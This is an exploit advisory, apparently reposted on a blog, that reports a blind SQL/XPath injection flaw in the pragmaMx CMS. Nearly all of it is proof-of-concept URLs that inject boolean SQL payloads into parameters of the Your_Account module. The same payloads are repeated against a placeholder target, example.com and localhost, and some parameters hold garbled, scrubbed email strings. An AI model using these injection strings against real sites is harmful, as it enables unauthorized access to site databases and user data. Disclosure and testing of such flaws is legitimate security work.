###########################################
#
# CMS Name : pragmaMx ( All Version )
#
# Bug Type : Blind SQL/XPath Injection vulnerability
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi [at] hotmail.com
#
# Download : http://sourceforge.net/projects/pragmamx/files/pragmaMx%20%20%28full%29/
pragmaMx%200.1.11/pragmaMx_0.1.11.0.tar.gz/download
#
###########################################
PoC :
http://[target]/[path]/modules.php?name=Your_Account&rop=showcontent"+an
d+31337-31337=0+--+&id=111-222-1933email (at) address (dot) tst [email concealed]
http://[target]/[path]/modules.php?name=Your_Account&min=0&orderby=dateD
"+and+31337-31337=0+--+&cid=0&jumpswitch=Switch
http://[target]/[path]/modules.php?name=Your_Account&op=pass_lost&query=
111-222-1933email (at) address (dot) tst [email concealed]&min=0'+and+31337-31337='0&orderby=dateD
http://[target]/[path]/modules.php?name=Your_Account&rop=showcontent&id=
111-222-1933email (at) address (dot) tst [email concealed]"+and+31337-31337="0
example :
http://www.example.com/modules.php?name=Your_Account&rop=showcontent"+an
d+31337-31337=0+--+&id=111-222-1933email (at) address (dot) tst [email concealed]
http://www.example.com/modules.php?name=Your_Account&min=0&orderby=dateD
"+and+31337-31337=0+--+&cid=0&jumpswitch=Switch
http://www.example.com/modules.php?name=Your_Account&op=pass_lost&query=
111-222-1933email (at) address (dot) tst [email concealed]&min=0'+and+31337-31337='0&orderby=dateD
http://www.example.com/modules.php?name=Your_Account&rop=showcontent&id=
111-222-1933email (at) address (dot) tst [email concealed]"+and+31337-31337="0
local Example :
http://localhost/html/modules.php?name=Your_Account&rop=showcontent"+and
+31337-31337=0+--+&id=111-222-1933email (at) address (dot) tst [email concealed]
http://localhost/html/modules.php?name=Your_Account&min=0&orderby=dateD"
+and+31337-31337=0+--+&cid=0&jumpswitch=Switch
http://localhost/html/modules.php?name=Your_Account&op=pass_lost&query=1
11-222-1933email (at) address (dot) tst [email concealed]&min=0'+and+31337-31337='0&orderby=dateD
http://localhost/html/modules.php?name=Your_Account&rop=showcontent&id=1
11-222-1933email (at) address (dot) tst [email concealed]"+and+31337-31337="0
Tidak ada komentar:
Posting Komentar